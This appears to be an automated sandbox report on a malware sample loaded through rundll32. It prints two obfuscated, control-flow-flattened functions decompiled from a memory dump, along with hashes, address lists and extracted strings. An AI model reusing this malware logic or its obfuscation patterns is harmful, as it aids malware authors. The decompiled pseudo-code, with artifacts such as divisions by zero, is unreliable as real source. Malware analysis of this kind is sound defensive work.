Opcode ID: 4cc7dacae70305634cf0a541199c532b014e6aae2c7573dd6da9589ccb518e2e
Instruction ID: 1b5b531a4e155d74a687dd25ea9459a2fac5dff3e7d21160ba5c2dfac250c2a6
Opcode Fuzzy Hash: 4cc7dacae70305634cf0a541199c532b014e6aae2c7573dd6da9589ccb518e2e
Instruction Fuzzy Hash: C0B150B11083819FE758CF65C98941BFBE1BBC4758F50891EF296862A0C3B9CA59CF47

Uniqueness

Uniqueness Score: -1.00%

Function 002006C2, Relevance: 15.4, Strings: 12, Instructions: 383
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E002006C2(intOrPtr* __ecx, void* __edx, char _a4, intOrPtr _a8, intOrPtr* _a12) {
				char _v1;
				char _v96;
				char _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				intOrPtr _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				intOrPtr _v264;
				signed int _v268;
				intOrPtr _v272;
				signed int _v276;
				signed int _v280;
				unsigned int _v284;
				signed int _v288;
				void* _t345;
				intOrPtr _t372;
				void* _t379;
				signed int _t383;
				void* _t391;
				intOrPtr* _t399;
				char _t404;
				intOrPtr* _t410;
				char* _t433;
				char* _t436;
				signed int _t437;
				intOrPtr* _t440;
				signed int* _t442;
				void* _t445;

				_t399 = _a12;
				_push(_t399);
				_push(_a8);
				_t440 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001F56B2(_t345);
				_v120 = 0x55e52e;
				_v112 = 0;
				_t442 =  &(( &_v288)[5]);
				_v116 = 0x6a087e;
				_v148 = 0x434e;
				_t437 = 0x13292eb2;
				_v148 = _v148 + 0xffff9485;
				_v148 = _v148 ^ 0xffffd793;
				_v156 = 0xec79;
				_v156 = _v156 ^ 0xb43b0e66;
				_v156 = _v156 ^ 0xb43be21d;
				_v200 = 0xee7d;
				_v200 = _v200 | 0x0533a7d7;
				_v200 = _v200 + 0xfffff45a;
				_v200 = _v200 ^ 0x05338944;
				_v216 = 0x86ca;
				_v216 = _v216 + 0x54b4;
				_v216 = _v216 ^ 0xa0eca1d2;
				_v216 = _v216 ^ 0xa0ec1e31;
				_v232 = 0x5704;
				_v232 = _v232 + 0x87d6;
				_push(0x16);
				_v164 = 0;
				_push(7);
				_v232 = _v232 / 0;
				_v232 = _v232 >> 5;
				_v232 = _v232 ^ 0x000017c2;
				_v240 = 0x5173;
				_v240 = _v240 * 0x25;
				_v240 = _v240 << 0xa;
				_v240 = _v240 / 0;
				_v240 = _v240 ^ 0x06ba4efb;
				_v248 = 0xc74b;
				_v248 = _v248 * 0x7e;
				_v248 = _v248 + 0xffff822f;
				_v248 = _v248 * 0x4c;
				_v248 = _v248 ^ 0x1cf92e4a;
				_v256 = 0x686e;
				_v256 = _v256 * 0x12;
				_v256 = _v256 ^ 0xf8fdd26c;
				_v256 = _v256 * 0x52;
				_v256 = _v256 ^ 0xc03ea1b3;
				_v244 = 0x2add;
				_v244 = _v244 << 0xf;
				_v244 = _v244 + 0xffffde04;
				_v244 = _v244 << 8;
				_v244 = _v244 ^ 0x6e5e34dd;
				_v284 = 0xf4e0;
				_v284 = _v284 + 0xba09;
				_v284 = _v284 | 0xa2bb5836;
				_v284 = _v284 >> 2;
				_v284 = _v284 ^ 0x28aee5c9;
				_v168 = 0x9f31;
				_v168 = _v168 >> 6;
				_v168 = _v168 ^ 0x000048ec;
				_v220 = 0x7e53;
				_v220 = _v220 << 6;
				_v220 = _v220 * 0x50;
				_v220 = _v220 ^ 0x09de0db5;
				_v188 = 0x17a8;
				_v188 = _v188 + 0x52a9;
				_v188 = _v188 / 0;
				_v188 = _v188 ^ 0x00004610;
				_v196 = 0x5cc1;
				_v196 = _v196 + 0xffff31d1;
				_v196 = _v196 | 0xc97284eb;
				_v196 = _v196 ^ 0xffffe02f;
				_v172 = 0xda7e;
				_v172 = _v172 << 0xe;
				_v172 = _v172 ^ 0x369fe494;
				_v144 = 0xccad;
				_v144 = _v144 | 0x339a4d00;
				_v144 = _v144 ^ 0x339a877a;
				_v288 = 0xfcaa;
				_v288 = _v288 << 2;
				_v288 = _v288 + 0x9909;
				_v288 = _v288 << 0xc;
				_v288 = _v288 ^ 0x48bb2562;
				_v152 = 0x61b7;
				_v152 = _v152 << 0x10;
				_v152 = _v152 ^ 0x61b70a03;
				_v140 = 0xc302;
				_v140 = _v140 << 0xf;
				_v140 = _v140 ^ 0x61816c1a;
				_v160 = 0x48ef;
				_v160 = _v160 ^ 0xebfd6bf9;
				_v160 = _v160 ^ 0xebfd7750;
				_v260 = 0x5362;
				_v260 = _v260 >> 6;
				_t404 = 0x6c;
				_v260 = _v260 / 0;
				_v260 = _v260 ^ 0xee3aff63;
				_v260 = _v260 ^ 0xee3aef31;
				_v236 = 0xd35f;
				_v236 = _v236 << 0x10;
				_v236 = _v236 + 0x2900;
				_v236 = _v236 + 0x50af;
				_v236 = _v236 ^ 0xd35f0d2f;
				_v212 = 0x828e;
				_v212 = _v212 | 0x8b388828;
				_v212 = _v212 * 0xa;
				_v212 = _v212 ^ 0x70352860;
				_v228 = 0xeb91;
				_v228 = _v228 ^ 0xa86be6f8;
				_v228 = _v228 + 0xffff5277;
				_v228 = _v228 ^ 0xa86a6f69;
				_v184 = 0xae04;
				_v184 = _v184 + 0xffff62af;
				_v184 = _v184 ^ 0x0000117e;
				_v224 = 0x33a1;
				_v224 = _v224 >> 1;
				_v224 = _v224 >> 7;
				_v224 = _v224 ^ 0x00005b9c;
				_v268 = 0xe65;
				_v268 = _v268 * 0x1a;
				_v268 = _v268 >> 2;
				_v268 = _v268 >> 5;
				_v268 = _v268 ^ 0x00000bed;
				_v176 = 0xa4d1;
				_v176 = _v176 | 0x37797fb5;
				_v176 = _v176 ^ 0x3779d180;
				_v252 = 0x4dfa;
				_v252 = _v252 >> 0xf;
				_v252 = _v252 ^ 0x7040ff32;
				_v252 = _v252 ^ 0x70408cc6;
				_v276 = 0x9261;
				_v276 = _v276 ^ 0x928292e1;
				_v276 = _v276 + 0xbfd3;
				_v276 = _v276 >> 0xd;
				_v276 = _v276 ^ 0x0004a09c;
				_v192 = 0x5c67;
				_v192 = _v192 << 4;
				_v192 = _v192 >> 0xf;
				_v192 = _v192 ^ 0x00002cc8;
				_v204 = 0xa9b8;
				_v204 = _v204 << 5;
				_v204 = _v204 + 0xffff3dee;
				_v204 = _v204 ^ 0x0014203e;
				_v180 = 0xc206;
				_v180 = _v180 * 0x36;
				_v180 = _v180 ^ 0x0028c8dc;
				_v280 = 0x96db;
				_v280 = _v280 + 0xeb7e;
				_v280 = _v280 >> 7;
				_v280 = _v280 ^ 0x33900b7e;
				_v280 = _v280 ^ 0x33901db2;
				_v208 = 0xb5f5;
				_v208 = _v208 >> 6;
				_v208 = _v208 + 0xfc0c;
				_v208 = _v208 ^ 0x0000fee2;
				_t436 = _v132;
				while(1) {
					L1:
					_t427 = _v264;
					_t365 = _v272;
					while(1) {
						_t445 = _t437 - 0x19192d48;
						if(_t445 > 0) {
							goto L23;
						}
						L3:
						if(_t445 == 0) {
							_v124 = _t404;
							_t379 = E002005E8( &_v108,  *((intOrPtr*)( *0x2121b4 + 0x14)), _v148, _v212, _v228, _v184, _v224, _v208,  *((intOrPtr*)( *0x2121b4)),  &_v124);
							_t442 =  &(_t442[8]);
							if(_t379 == 0) {
								_t437 = 0x272c22c8;
							} else {
								_t410 =  &_v1;
								_t433 = _t436;
								do {
									 *_t433 =  *_t410;
									_t433 = _t433 + 1;
									_t410 = _t410 - 1;
								} while (_t410 >=  &_v96);
								_t437 = 0xe3e0850;
							}
							goto L9;
						} else {
							if(_t437 == 0x95d06e9) {
								_t383 = _a4 + 1;
								if((_t383 & 0x0000000f) != 0) {
									_t383 = (_t383 & 0xfffffff0) + 0x10;
								}
								 *((intOrPtr*)(_t399 + 4)) = _t383 + 0x74;
								_push(_t404);
								_t436 = E002057E8( *((intOrPtr*)(_t399 + 4)));
								 *_t399 = _t436;
								if(_t436 == 0) {
									goto L34;
								}
								_t305 = _t436 + 0x74; // 0x74
								_t427 = _t305;
								_t365 =  *((intOrPtr*)(_t399 + 4)) - 0x74;
								_v264 = _t305;
								_t437 = 0x154603b2;
								_v132 = _a4;
								_v272 =  *((intOrPtr*)(_t399 + 4)) - 0x74;
								goto L10;
							} else {
								if(_t437 == 0xe3e0850) {
									_v128 = 0x14;
									_t391 = E001F7471(_v156, _v268, _v176, _v252,  &_v128, _v276, _t436 + 0x60, _t404, _v192, _v136);
									_t427 = _v264;
									_t442 =  &(_t442[8]);
									_t365 = _v272;
									_t404 = 0x6c;
									if(_t391 == 0) {
										continue;
									} else {
										_t437 = 0x272c22c8;
										_v164 = 1;
										goto L9;
									}
								} else {
									if(_t437 == 0x13292eb2) {
										_t437 = 0x95d06e9;
										continue;
									} else {
										if(_t437 != 0x154603b2) {
											L30:
											if(_t437 == 0x4324b34) {
												L34:
												return _v164;
											}
											goto L1;
										} else {
											_t280 =  &_v284; // 0xee3aef31
											E001FCB42(_v244,  *_t280, _v168, _t404,  &_v136,  *((intOrPtr*)( *0x2121b4 + 0x10)), _t404, _v220);
											_t442 =  &(_t442[6]);
											asm("sbb esi, esi");
											_t437 = (_t437 & 0xeb9139e0) + 0x306f06ef;
											L9:
											_t365 = _v272;
											_t427 = _v264;
											L10:
											_t404 = 0x6c;
											while(1) {
												_t445 = _t437 - 0x19192d48;
												if(_t445 > 0) {
													goto L23;
												}
												goto L3;
											}
											goto L23;
										}
									}
								}
							}
						}
						L24:
						if(_t437 == 0x272c22c8) {
							_push(_t404);
							E001FD7B0(_v136);
							_t437 = 0x306f06ef;
							goto L9;
						}
						if(_t437 != 0x306f06ef) {
							if(_t437 != 0x31bcf33d) {
								goto L30;
							} else {
								E0020413E(_v144, _v288, _v152, _v140, _v160,  &_v132, _t427,  *((intOrPtr*)( *0x2121b4)),  &_v132, _v260, _v136, _t365, _v236,  &_v132);
								_t442 =  &(_t442[0xc]);
								asm("sbb esi, esi");
								_t437 = (_t437 & 0xf1ed0a80) + 0x272c22c8;
								goto L9;
							}
						}
						_t372 = _v164;
						if(_t372 == 0) {
							E001F91CD(_v232, _v240, _v248,  *_t399, _v256);
							goto L34;
						}
						return _t372;
						L23:
						if(_t437 == 0x1c0040cf) {
							E001F9970(_v188,  *_t440, _v196, _t427, _a4, _v172);
							_t442 =  &(_t442[4]);
							_t437 = 0x31bcf33d;
							_t404 = 0x6c;
							goto L30;
						}
						goto L24;
					}
				}
			}

0x002006c9
0x002006d3
0x002006d4
0x002006db
0x002006dd
0x002006e4
0x002006e5
0x002006e6
0x002006eb
0x002006f8
0x002006ff
0x00200702
0x0020070f
0x0020071a
0x0020071f
0x0020072a
0x00200735
0x00200740
0x0020074b
0x00200756
0x0020075e
0x00200766
0x0020076e
0x00200776
0x0020077e
0x00200786
0x0020078e
0x00200796
0x0020079e
0x002007aa
0x002007ac
0x002007b6
0x002007b8
0x002007be
0x002007c3
0x002007cb
0x002007d9
0x002007dd
0x002007e8
0x002007ec
0x002007f4
0x00200801
0x00200805
0x00200812
0x00200816
0x0020081e
0x0020082b
0x0020082f
0x0020083c
0x00200840
0x00200848
0x00200850
0x00200855
0x0020085d
0x00200862
0x0020086a
0x00200872
0x0020087a
0x00200882
0x00200887
0x0020088f
0x0020089a
0x002008a2
0x002008ad
0x002008b7
0x002008c3
0x002008c7
0x002008cf
0x002008d7
0x002008e7
0x002008eb
0x002008f3
0x002008fb
0x00200903
0x0020090b
0x00200913
0x0020091e
0x00200926
0x00200931
0x0020093c
0x00200947
0x00200952
0x0020095a
0x0020095f
0x00200967
0x0020096c
0x00200974
0x0020097f
0x00200987
0x00200992
0x0020099d
0x002009a5
0x002009b0
0x002009bb
0x002009c6
0x002009d1
0x002009d9
0x002009e2
0x002009e5
0x002009e9
0x002009f1
0x002009f9
0x00200a01
0x00200a06
0x00200a0e
0x00200a16
0x00200a1e
0x00200a26
0x00200a33
0x00200a37
0x00200a3f
0x00200a47
0x00200a4f
0x00200a57
0x00200a5f
0x00200a67
0x00200a6f
0x00200a77
0x00200a7f
0x00200a83
0x00200a88
0x00200a90
0x00200a9d
0x00200aa1
0x00200aa6
0x00200aab
0x00200ab3
0x00200abe
0x00200ac9
0x00200ad4
0x00200adc
0x00200ae9
0x00200af1
0x00200af9
0x00200b01
0x00200b09
0x00200b11
0x00200b16
0x00200b1e
0x00200b26
0x00200b2b
0x00200b30
0x00200b38
0x00200b40
0x00200b45
0x00200b4d
0x00200b55
0x00200b62
0x00200b66
0x00200b6e
0x00200b76
0x00200b7e
0x00200b83
0x00200b8b
0x00200b93
0x00200b9b
0x00200ba0
0x00200ba8
0x00200bb0
0x00200bb7
0x00200bb7
0x00200bb7
0x00200bbb
0x00200bbf
0x00200bbf
0x00200bc5
0x00000000
0x00000000
0x00200bcb
0x00200bcb
0x00200d1a
0x00200d57
0x00200d5c
0x00200d61
0x00200d87
0x00200d63
0x00200d63
0x00200d6a
0x00200d6c
0x00200d6e
0x00200d70
0x00200d71
0x00200d79
0x00200d7d
0x00200d7d
0x00000000
0x00200bd1
0x00200bd7
0x00200cbf
0x00200cc2
0x00200cc7
0x00200cc7
0x00200ccd
0x00200cd8
0x00200ce1
0x00200ce3
0x00200ce8
0x00000000
0x00000000
0x00200cf1
0x00200cf1
0x00200cf7
0x00200cfa
0x00200cfe
0x00200d03
0x00200d0a
0x00000000
0x00200bdd
0x00200be3
0x00200c5a
0x00200c8d
0x00200c92
0x00200c96
0x00200c9b
0x00200ca1
0x00200ca2
0x00000000
0x00200ca8
0x00200caa
0x00200cb0
0x00000000
0x00200cb0
0x00200be5
0x00200beb
0x00200c46
0x00000000
0x00200bed
0x00200bf3
0x00200e6a
0x00200e70
0x00200e9c
0x00000000
0x00200e9c
0x00000000
0x00200bf9
0x00200c16
0x00200c1e
0x00200c23
0x00200c28
0x00200c30
0x00200c36
0x00200c36
0x00200c3a
0x00200c3e
0x00200c40
0x00200bbf
0x00200bbf
0x00200bc5
0x00000000
0x00000000
0x00000000
0x00200bc5
0x00000000
0x00200bbf
0x00200bf3
0x00200beb
0x00200be3
0x00200bd7
0x00200d9d
0x00200da3
0x00200e28
0x00200e30
0x00200e37
0x00000000
0x00200e37
0x00200dab
0x00200db7
0x00000000
0x00200dbd
0x00200dff
0x00200e04
0x00200e09
0x00200e11
0x00000000
0x00200e11
0x00200db7
0x00200e77
0x00200e80
0x00200e94
0x00000000
0x00200e99
0x00200ead
0x00200d91
0x00200d97
0x00200e5a
0x00200e5f
0x00200e62
0x00200e69
0x00000000
0x00200e69
0x00000000
0x00200d97
0x00200bbf

Strings

.U, xrefs: 002006EB
H, xrefs: 002008A2
S~, xrefs: 002008AD
~, xrefs: 00200B76
1:, xrefs: 00200C16
H, xrefs: 002009B0
g\, xrefs: 00200B1E
NC, xrefs: 0020070F
`(5p, xrefs: 00200A37
}, xrefs: 00200756
sQ, xrefs: 002007CB
bS, xrefs: 002009D1

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: .U$1:$NC$S~$`(5p$bS$g\$sQ$}$~$H$H
API String ID: 0-2586239605
Opcode ID: a608d14918b016dcff38752a410551d3afa3220f36f0ac4516be866224b1d620
Instruction ID: a9d41b2098b2fd95f6078c9e89c9b21ee52829c6343342aec1a84275c771ebbb
Opcode Fuzzy Hash: a608d14918b016dcff38752a410551d3afa3220f36f0ac4516be866224b1d620
Instruction Fuzzy Hash: 83123271418381DFE368CF24C989A5BBBF1BBC4708F108A1DE6D9862A1D7B59958CF43

Uniqueness

Uniqueness Score: -1.00%

Function 001FA176, Relevance: 15.3, Strings: 12, Instructions: 324
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E001FA176() {
				char _v524;
				signed int _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _v704;
				signed int _v708;
				signed int _t350;
				intOrPtr _t357;
				void* _t360;
				void* _t361;
				void* _t366;
				void* _t367;
				char _t375;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				signed int _t409;
				signed int _t410;
				signed int _t411;
				signed int* _t414;

				_t414 =  &_v708;
				_v616 = 0x2445;
				_v616 = _v616 >> 0x10;
				_v616 = _v616 ^ 1;
				_v636 = 0xeea4;
				_t367 = 0x3f32878;
				_v636 = _v636 << 0xb;
				_v636 = _v636 << 1;
				_v636 = _v636 ^ 0x0eea4100;
				_v652 = 0xe797;
				_v652 = _v652 ^ 0x321c1edf;
				_v652 = _v652 ^ 0xd996a04c;
				_v652 = _v652 ^ 0xeb8a76ce;
				_v588 = 0xdcfc;
				_v588 = _v588 >> 7;
				_v588 = _v588 ^ 0x00000f60;
				_v612 = 0x8579;
				_v612 = _v612 + 0x6109;
				_v612 = _v612 ^ 0x0000e794;
				_v648 = 0x1b6b;
				_v648 = _v648 + 0xffff6a60;
				_v648 = _v648 << 0x10;
				_v648 = _v648 ^ 0x85cb09dc;
				_v584 = 0x1ff6;
				_v584 = _v584 << 0x10;
				_v584 = _v584 ^ 0x1ff65b4e;
				_v684 = 0xbc40;
				_v684 = _v684 >> 2;
				_v684 = _v684 + 0xffffd1fb;
				_v684 = _v684 | 0x2742d37c;
				_v684 = _v684 ^ 0x2742ef01;
				_v576 = 0x685a;
				_t404 = 0x6c;
				_v576 = _v576 / _t404;
				_v576 = _v576 ^ 0x00007f72;
				_t366 = 0;
				_v708 = 0x6bcc;
				_v708 = _v708 >> 8;
				_t405 = 0x3a;
				_v708 = _v708 * 0x2a;
				_v708 = _v708 >> 7;
				_v708 = _v708 ^ 0x0000462a;
				_v692 = 0xff9b;
				_v692 = _v692 | 0x74d94da3;
				_v692 = _v692 + 0xffffcc68;
				_v692 = _v692 | 0xbe89bc47;
				_v692 = _v692 ^ 0xfed98c58;
				_v632 = 0x3226;
				_v632 = _v632 | 0x070ffe2e;
				_v632 = _v632 / _t405;
				_v632 = _v632 ^ 0x001f3575;
				_v600 = 0xa48;
				_v600 = _v600 + 0xb52e;
				_v600 = _v600 ^ 0x0000cedf;
				_v580 = 0xa18a;
				_v580 = _v580 | 0x0c5a8a6e;
				_v580 = _v580 ^ 0x0c5abff1;
				_v664 = 0xe8f;
				_t406 = 0x37;
				_v664 = _v664 / _t406;
				_t407 = 0x46;
				_v664 = _v664 / _t407;
				_v664 = _v664 ^ 0x00006dce;
				_v640 = 0x71c;
				_v640 = _v640 << 0xe;
				_t408 = 0x49;
				_v640 = _v640 * 0x34;
				_v640 = _v640 ^ 0x5c6c577c;
				_v592 = 0x33b8;
				_v592 = _v592 | 0x07d87d51;
				_v592 = _v592 ^ 0x07d84187;
				_v696 = 0xa98f;
				_v696 = _v696 << 0xf;
				_v696 = _v696 + 0xffffe799;
				_v696 = _v696 + 0xffff3d0e;
				_v696 = _v696 ^ 0x54c69949;
				_v704 = 0x7465;
				_v704 = _v704 + 0xffffe849;
				_v704 = _v704 / _t408;
				_v704 = _v704 + 0xd0f1;
				_v704 = _v704 ^ 0x0000e434;
				_v596 = 0x236f;
				_v596 = _v596 | 0xc5dcb8d9;
				_v596 = _v596 ^ 0xc5dcb094;
				_v644 = 0x8021;
				_v644 = _v644 ^ 0xc828a343;
				_v644 = _v644 >> 3;
				_v644 = _v644 ^ 0x190550b3;
				_v604 = 0xfe6;
				_v604 = _v604 >> 0xb;
				_v604 = _v604 ^ 0x00002a8f;
				_v668 = 0x55eb;
				_v668 = _v668 | 0x71753889;
				_v668 = _v668 << 6;
				_v668 = _v668 ^ 0x5d5f3da4;
				_v608 = 0x70d4;
				_v608 = _v608 << 0xf;
				_v608 = _v608 ^ 0x386a033c;
				_v624 = 0xcf56;
				_t409 = 0x3d;
				_v624 = _v624 / _t409;
				_v624 = _v624 | 0x0bd4b4ae;
				_v624 = _v624 ^ 0x0bd4d1b6;
				_v660 = 0x16e5;
				_t410 = 0x36;
				_v660 = _v660 * 0x41;
				_v660 = _v660 / _t410;
				_v660 = _v660 ^ 0x0000307e;
				_v700 = 0xe2b6;
				_v700 = _v700 + 0x5bb5;
				_v700 = _v700 + 0xffff6142;
				_v700 = _v700 + 0x6e4e;
				_v700 = _v700 ^ 0x000141ab;
				_v656 = 0xb40;
				_v656 = _v656 + 0xffff4f1f;
				_v656 = _v656 ^ 0x21083a9e;
				_v656 = _v656 ^ 0xdef717ac;
				_v672 = 0x17c4;
				_v672 = _v672 | 0x21da6493;
				_t411 = 0x13;
				_v672 = _v672 / _t411;
				_v672 = _v672 * 0x3b;
				_v672 = _v672 ^ 0x691fea24;
				_v620 = 0x1ec3;
				_v620 = _v620 | 0x77b1d73c;
				_v620 = _v620 + 0xffffec92;
				_v620 = _v620 ^ 0x77b1dc68;
				_v628 = 0x112b;
				_t403 = _v616;
				_v628 = _v628 * 0x73;
				_v628 = _v628 << 0xd;
				_v628 = _v628 ^ 0xf6ca7d12;
				_v680 = 0x3092;
				_v680 = _v680 * 0x68;
				_v680 = _v680 << 1;
				_v680 = _v680 + 0xfffffa86;
				_v680 = _v680 ^ 0x00277106;
				_v676 = 0x2780;
				_v676 = _v676 ^ 0x4b6da339;
				_v676 = _v676 * 0x7a;
				_v676 = _v676 << 0xe;
				_v676 = _v676 ^ 0x500a8000;
				_v688 = 0x8ae7;
				_v688 = _v688 | 0x8dfab5cc;
				_v688 = _v688 * 0x18;
				_v688 = _v688 | 0x52f27c13;
				_v688 = _v688 ^ 0x5ff3fe78;
				do {
					while(_t367 != 0x3ba1fc4) {
						if(_t367 == 0x3f32878) {
							_t367 = 0x26bd27de;
							continue;
						} else {
							if(_t367 == 0x20bf73ca) {
								_push(0x1f1000);
								_push(_v684);
								E002063BF(E0020BF25(_v648, _v584, __eflags), __eflags, _v708, _v692,  &_v524,  *0x2121b0, _v632,  *0x2121b0 + 0x234,  *0x2121b0 + 0x10, _v600);
								E0020C5F7(_v580, _v664, _v640, _v592, _t351);
								_t414 =  &(_t414[0xb]);
								_t367 = 0x3ba1fc4;
								continue;
							} else {
								if(_t367 == 0x24e637ac) {
									_t357 = _v568;
									_t375 = _v572;
									_v560 = _t357;
									_v552 = _t357;
									_v544 = _t357;
									_v536 = _t357;
									_v532 = _v676;
									_v564 = _t375;
									_v556 = _t375;
									_v548 = _t375;
									_v540 = _t375;
									_t360 = E001FBFA7(_v624, _t375, _v660, _v700,  &_v564, _t403, _v656);
									_t414 =  &(_t414[6]);
									_t367 = 0x2e72accb;
									__eflags = _t360;
									_t361 = 1;
									_t366 =  !=  ? _t361 : _t366;
									continue;
								} else {
									if(_t367 == 0x26bd27de) {
										E00202092(_v652,  &_v572, _v588, _v612);
										_t367 = 0x2c000c16;
										continue;
									} else {
										if(_t367 == 0x2c000c16) {
											_v572 = _v572 - E001F23BC();
											_t367 = 0x20bf73ca;
											asm("sbb [esp+0x9c], edx");
											continue;
										} else {
											if(_t367 != 0x2e72accb) {
												goto L18;
											} else {
												E001F78F0(_t403, _v672, _v620, _v628, _v680);
											}
										}
									}
								}
							}
						}
						L9:
						return _t366;
					}
					_t350 = E001F492A(_v688, _v616, _v696, _v704, _v596, _t367, _v636, _v644, _t367,  &_v524, 0, _v604, _v668, _v608);
					_t403 = _t350;
					_t414 =  &(_t414[0xc]);
					__eflags = _t350 - 0xffffffff;
					if(__eflags == 0) {
						_t367 = 0x1fc7849e;
						goto L18;
					} else {
						_t367 = 0x24e637ac;
						continue;
					}
					goto L9;
					L18:
					__eflags = _t367 - 0x1fc7849e;
				} while (__eflags != 0);
				goto L9;
			}

0x001fa176
0x001fa180
0x001fa18a
0x001fa190
0x001fa196
0x001fa19e
0x001fa1a3
0x001fa1a8
0x001fa1ac
0x001fa1b4
0x001fa1bc
0x001fa1c4
0x001fa1cc
0x001fa1d4
0x001fa1df
0x001fa1e7
0x001fa1f2
0x001fa1fa
0x001fa202
0x001fa20a
0x001fa212
0x001fa21a
0x001fa21f
0x001fa227
0x001fa232
0x001fa23a
0x001fa245
0x001fa24d
0x001fa252
0x001fa25a
0x001fa262
0x001fa26a
0x001fa27e
0x001fa283
0x001fa28c
0x001fa297
0x001fa299
0x001fa2a1
0x001fa2ab
0x001fa2ae
0x001fa2b2
0x001fa2b7
0x001fa2bf
0x001fa2c7
0x001fa2cf
0x001fa2d7
0x001fa2df
0x001fa2e7
0x001fa2ef
0x001fa2ff
0x001fa303
0x001fa30b
0x001fa316
0x001fa321
0x001fa32c
0x001fa337
0x001fa342
0x001fa34d
0x001fa359
0x001fa35e
0x001fa368
0x001fa36d
0x001fa373
0x001fa37b
0x001fa383
0x001fa38d
0x001fa390
0x001fa394
0x001fa39c
0x001fa3a7
0x001fa3b2
0x001fa3bd
0x001fa3c5
0x001fa3ca
0x001fa3d2
0x001fa3da
0x001fa3e2
0x001fa3ea
0x001fa3fa
0x001fa3fe
0x001fa406
0x001fa40e
0x001fa419
0x001fa424
0x001fa42f
0x001fa437
0x001fa43f
0x001fa444
0x001fa44c
0x001fa454
0x001fa459
0x001fa461
0x001fa469
0x001fa471
0x001fa476
0x001fa47e
0x001fa486
0x001fa48b
0x001fa493
0x001fa49f
0x001fa4a4
0x001fa4aa
0x001fa4b2
0x001fa4ba
0x001fa4c7
0x001fa4ca
0x001fa4d6
0x001fa4da
0x001fa4e2
0x001fa4ea
0x001fa4f2
0x001fa4fa
0x001fa502
0x001fa50a
0x001fa512
0x001fa51a
0x001fa522
0x001fa52a
0x001fa532
0x001fa53e
0x001fa541
0x001fa54a
0x001fa553
0x001fa55b
0x001fa563
0x001fa56b
0x001fa573
0x001fa57b
0x001fa588
0x001fa58c
0x001fa590
0x001fa595
0x001fa59d
0x001fa5aa
0x001fa5ae
0x001fa5b2
0x001fa5ba
0x001fa5c2
0x001fa5ca
0x001fa5d7
0x001fa5db
0x001fa5e0
0x001fa5e8
0x001fa5f0
0x001fa5fd
0x001fa601
0x001fa609
0x001fa611
0x001fa611
0x001fa623
0x001fa7c7
0x00000000
0x001fa629
0x001fa62f
0x001fa749
0x001fa74e
0x001fa799
0x001fa7b5
0x001fa7ba
0x001fa7bd
0x00000000
0x001fa635
0x001fa637
0x001fa6c4
0x001fa6cb
0x001fa6d2
0x001fa6d9
0x001fa6e0
0x001fa6e7
0x001fa6f6
0x001fa70a
0x001fa715
0x001fa71c
0x001fa723
0x001fa72f
0x001fa734
0x001fa737
0x001fa73c
0x001fa740
0x001fa741
0x00000000
0x001fa63d
0x001fa643
0x001fa6b3
0x001fa6ba
0x00000000
0x001fa645
0x001fa64b
0x001fa685
0x001fa68c
0x001fa691
0x00000000
0x001fa64d
0x001fa653
0x00000000
0x001fa659
0x001fa66b
0x001fa670
0x001fa653
0x001fa64b
0x001fa643
0x001fa637
0x001fa62f
0x001fa676
0x001fa67f
0x001fa67f
0x001fa80e
0x001fa813
0x001fa815
0x001fa818
0x001fa81b
0x001fa824
0x00000000
0x001fa81d
0x001fa81d
0x00000000
0x001fa81d
0x00000000
0x001fa829
0x001fa829
0x001fa829
0x00000000

Strings

4, xrefs: 001FA406
a, xrefs: 001FA1FA
|Wl\, xrefs: 001FA394
&2, xrefs: 001FA2E7
U, xrefs: 001FA461
o#, xrefs: 001FA40E
H, xrefs: 001FA30B
Zh, xrefs: 001FA26A
Nn, xrefs: 001FA4FA
E$, xrefs: 001FA180
*F, xrefs: 001FA2B7
~0, xrefs: 001FA4DA

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: a$&2$*F$4$E$$H$Nn$Zh$o#$|Wl\$~0$U
API String ID: 0-3924455481
Opcode ID: 134069770a31948d234980a50910f030b90c1d84e754e185a23ca528d1d7733d
Instruction ID: 48695a6f486ed6afd6122386ba0ae359ed1ca08161f1c328882763b8e7a9464f
